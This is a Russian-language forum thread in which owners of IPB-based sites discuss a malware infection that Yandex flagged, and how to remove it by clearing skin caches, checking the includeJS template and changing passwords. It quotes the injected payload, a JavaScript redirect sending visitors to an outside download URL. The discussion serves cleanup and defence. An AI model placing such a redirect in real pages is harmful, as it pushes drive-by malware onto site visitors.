Вопрос такой: на днях Яндекс сообщил мне, что мой сайт заражен вредоносным кодом.

 

Я полез в Яндекс.Вебмастер, который мне сообщал, что вердикт мне вынесен "Поведенческий анализ"

А именно:

 

Поведенческий анализ

 

Антивирусный робот Яндекса при проверке страниц анализирует поведение JavaScript-кода и других активных элементов. Если поведение совпадает с эвристическими правилами, характерными для drive-by-download атак, например, детектор вредоносных Java апплетов или детектор вредоносных PDF документов обнаруживают попытку эксплуатации уязвимости для выполнения вредоносного кода, то принимается решение о том, что проверяемая страница является опасной для посетителей.

 

Я, если честно, так и не понял что с этим делать и что и где искать. По всем остальным вердиктам хоть что-то понятно.

 

Написал вопрос в саппорт, ответ был следующим:

 

На Вашем сайте с помощью url: sport-horse.pro/index.php?ipbv=e13484a4543e54a53b72269a15c16faa&g=js периодически подгружается следующее вредоносное содержимое:

document.location='http://filestore321.com/download.php?id=6de46215' 

 

Действительно такая похожая ссылка на страницах форума встречается, но аналогичные ссылки есть в кодах страниц на других форумах.

В общем я в тупике и не понимаю в какую сторону мне рыть.

 

Делаю полный бекап форума на локалку и мыслю проверить какими-то антивирусами.

Попробовал прогнать сайт по известным мне онлайн-проверяльщикам - никто ничего не нашел.

 

Может кто-то направить добрым советом в нужную сторону? Был бы крайне признателен за помощь.

Игорь, скорее всего ты прав - в том, что вирус заседает в шаблоне админ панели. Все это время, я его не мог поймать его в skin_global.php, а так-же БД.

 

После чистки cache всех шаблон, и папки с языками + удаления шаблона админ центра, а так-же всех JS, после перестроения всех кэшев и замены паролей, смены пути админ панели, смены пароля БД - фтп, запрет всем админам вход в АЦ.

 

Вирус начал отходить, последняя ссылка осталась для проверки в яндекс вебмастере. из 10 где-то

Код удаляется обновлением кешей стилей - Внешний Вид -> Инструменты -> Обновление кеш-файлов. Попутно нужно проверить шаблон includeJS в админцентре. Потом обязательно сменить пароли всех администраторов и к базе данных. Эти процедуры нужно проделать каждый раз после обнаружения вируса. Ко всему этому можно обновить и кеши языков.

Попутно нужно проверить шаблон includeJS в админцентре

Код с шаблона includeJS выложил в предыдущем посте (вирус там не нашел)

 

Потом обязательно сменить все пароли администраторов и к базе данных.

Все пароли еще раз поменял.

Код с шаблона includeJS выложил в предыдущем посте

Раз нету значит выкладывать блоки шаблона не нужно.

 

Шаблон желательно проверить для всех скинов.

Раз нету значит выкладывать блоки шаблона не нужно.

 

Шаблон желательно проверить для всех скинов.

у меня один скин на форуме

1. Проверка шаблона includeJS (Глобальные) в АЦ.

Скажите, пожалуйста, а если шаблон includeJS ни разу не редактировался (стоит черная метка), если в нем не принято никаких изменений с момента установки форума, значит всё в норме?

Скажите, пожалуйста, а если шаблон includeJS ни разу не редактировался (стоит черная метка), если в нем не принято никаких изменений с момента установки форума, значит всё в норме?

 

нет. Вирус может в кэше сидеть.

 

Вредоносный код сидит в /cache/skin_cache/cache_%id/skin_global.php, метод includeJS и имеет подобный вид:

@Атаман, нет такого кода у меня в кэше B)

У меня его тоже не было.

 

http://ipbskins.ru/f...dpost__p__90820

 

ответ сегодня. Усиленно ревизию произвел.

 

http://ipbskins.ru/f...dpost__p__90847

@Атаман, ну а как этот вирус попал к Вам в кэш? У меня его нет ни в АЦ, ни в skin_global.php. Вспоминается тема про комплексную защиту форума))

@Атаман, ну а как этот вирус попал к Вам в кэш? У меня его нет ни в АЦ, ни в skin_global.php. Вспоминается тема про комплексную защиту форума))

 

Аналогично. не мог его найти нигде, но закрыл всем доступ, и тд. Выше все действия свои сказал. Форум стал оживать. Как сказал Игорь, возможно где-то права были не доставлены и тд.

Я просто все на корню удалил, и все пароли поменял, и ограничил админов.

Игорь спасибо за подсказку и решение данного вопроса. Вирус ушёл.

я удаляю код по пути, который указал, он снова появляется, точно такой же, подскажи что делать?

на данный момент яндекс ругается на http://big-benz.ru/files/file/95-w463-300ge-g320-g500-tablitca-predohranitelej/

я удаляю код по пути, который указал, он снова появляется, точно такой же, подскажи что делать?

на данный момент яндекс ругается на http://big-benz.ru/f...redohranitelej/

Читайте тему полностью. Помимо удаления кода, нужно сменить пароли, проверить шаблон и т.д.

я удаляю код по пути, который указал

Значит вам еще раз нужно внимательно прочитать тему. Ответ на ваш вопрос можете прочитать здесь http://ipbskins.ru/forum/topic13571.html/page__view__findpost__p__90486

Скажите, если заново переустановлю форум и накачу на него бекап БД. Естественно пароли к БД и админке сменю.

Вирус уйдет? Какие мысли?